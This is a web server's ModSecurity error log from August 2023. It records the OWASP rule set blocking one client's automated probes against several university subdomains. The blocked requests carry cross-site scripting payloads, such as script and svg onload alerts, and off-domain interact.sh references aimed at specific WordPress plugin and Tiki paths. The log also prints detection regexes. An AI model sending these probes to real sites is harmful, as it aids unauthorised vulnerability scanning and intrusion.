[Tue Aug 29 11:55:17.697255 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqTvpsAAAAa"]
[Tue Aug 29 11:55:17.712822 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NcCo-f0AAAolKlwAAAAe"]
[Tue Aug 29 11:55:17.717508 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqTvpwAAAAa"]
[Tue Aug 29 11:55:17.735111 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NcCo-f0AAAolKl0AAAAe"]
[Tue Aug 29 11:55:18.587413 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NsCo-f0AAAqvjnEAAAAE"]
[Tue Aug 29 11:55:18.594785 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqsV5IAAAAB"]
[Tue Aug 29 11:55:18.594977 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqY6DEAAAAr"]
[Tue Aug 29 11:55:18.606483 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqvjnIAAAAE"]
[Tue Aug 29 11:55:18.647146 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqsV5QAAAAB"]
[Tue Aug 29 11:55:18.650742 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NsCo-f0AAAqSwroAAAAN"]
[Tue Aug 29 11:55:18.701467 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqeFTkAAAAx"]
[Tue Aug 29 11:55:19.569456 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqeFTwAAAAx"]
[Tue Aug 29 11:55:19.572180 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAolKmIAAAAe"]
[Tue Aug 29 11:55:19.575664 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqqtc4AAAAA"]
[Tue Aug 29 11:55:19.680779 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAApbUewAAAAh"]
[Tue Aug 29 11:55:19.709634 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqTvp8AAAAa"]
[Tue Aug 29 11:55:19.780538 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAolKmQAAAAe"]
[Tue Aug 29 11:55:19.783581 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqsV5oAAAAB"]
[Tue Aug 29 11:55:19.803229 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAoAk-kAAAAC"]
[Tue Aug 29 11:55:19.805716 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqsV5sAAAAB"]
[Tue Aug 29 11:55:19.810666 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqqtdEAAAAA"]
[Tue Aug 29 11:55:20.539288 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqSwsUAAAAN"]
[Tue Aug 29 11:55:20.547973 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16OMCo-f0AAAqqtdQAAAAA"]
[Tue Aug 29 11:55:20.573159 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/message"] [unique_id "ZO16OMCo-f0AAApbUfEAAAAh"]
[Tue Aug 29 11:55:20.615261 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAApbUfMAAAAh"]
[Tue Aug 29 11:55:20.688185 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAApbUfYAAAAh"]
[Tue Aug 29 11:55:20.691118 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqw518AAAAH"]
[Tue Aug 29 11:55:20.712472 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqw52AAAAAH"]
